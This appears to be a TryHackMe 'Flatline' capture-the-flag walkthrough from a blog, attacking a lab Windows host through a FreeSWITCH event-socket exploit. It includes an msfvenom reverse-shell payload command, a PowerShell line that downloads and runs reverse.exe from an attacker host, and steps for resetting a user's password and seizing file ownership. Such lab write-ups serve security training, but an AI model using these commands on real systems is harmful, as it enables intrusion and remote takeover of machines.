THM FLATLINE Walkthrough

Target IP: 10.10.152.43

#scanning IP
nmap 10.10.152.43 -Pn -p- — min-rate 1000 -A -vv

#ports open
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
8021/tcp open freeswitch-event syn-ack ttl 125 FreeSWITCH mod_event_socket

#3389

tried bruteforcing the logins but did not work.

#8021

found one exploit for this →

https://www.exploit-db.com/exploits/47799

after reading the exploit

#how to use it
./freeswitch-exploit.py 192.168.1.100 whoami

then copied this exploit on my machine and run it to test if it’s working or not
— — — — —
python3 exploit.py 10.10.152.43 whoami 130 ⨯
Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n\nekrotic
— — — — — -

so yeah it was working and now we just have to craft a “Windows Stageless reverse TCP”

if don’t know how u can check here:

“msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe”

and then give command to the target machine to download this malicious .exe file from our server (python), on it’s system and run it

which will be done by giving a
Invoke Web Request Command (Invoke-WebRequest -Uri <source> -OutFile <destination>) and .\reverse.exe (file run command) by using the exploit we have

so the command will be like this

python3 exploit.py 10.10.152.43 “powershell.exe Invoke-WebRequest -Uri http://<attacker_IP>:<port>/path_to_file -OutFile ./reverse.exe && .\reverse.exe “

keep in mind: have a terminal runnning listener on the port where the connection will be (according to the msfvenome exe file we created)

if you have done all the steps correctly you should have a reverse shell.

##NOW TO GET THE USER FLAG :

it is present in the desktop of Nekrotic

C:\Users\Nekrotic\Desktop>type user.txt
………….{FLAG}…………..

NOW FOR THE ROOT FLAG :

We can see there is a root flag in the same location but when i try to read it but i couldn’t, obviously it won’t be that easy.
— — — — — — — — -
C:\Users\Nekrotic\Desktop>type root.txt
type root.txt
Access is denied.
— — — — — — — — —

lets enumerate our user Nekrotic

— — — — — — — — — — — — — — -
C:\Users\Nekrotic>net user nekrotic
net user nekrotic
User name Nekrotic
Full Name Nekrotic
Comment
User’s comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 09/11/2021 07:16:49
Password expires Never
Password changeable 09/11/2021 07:16:49
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 28/02/2022 06:46:10

Logon hours allowed All

Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.

— — — — — — — — -

It has administrator privellege but still unable to read the file

lets change the password and login through port 3389, which i tried to bruteforce in the start.

— — — — — — — — — — —
C:\Users\Nekrotic>net user nekrotic W3bH3@d
net user nekrotic W3bH3@d
The command completed successfully.
— — — — — — — — — — — -

let’s log in through REMMINA

when trying to read the root.txt we get this error.

as we don’t have the permission to open the file, but if we make changes in the ownership then we can possibly read it. Let’s try doing that.

the rdp is so slow ……………. i m solving my cube everytime in between every couple of steps, and i am not even good at it.

changed the owner to nekrotic.

now i will just close and reopen the properties of root.txt to make changes .

after making changes to the groups, i can now read the file.

AND THE ROOM IS COMPLETED!!!

HAPPY HACKING 🥳.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store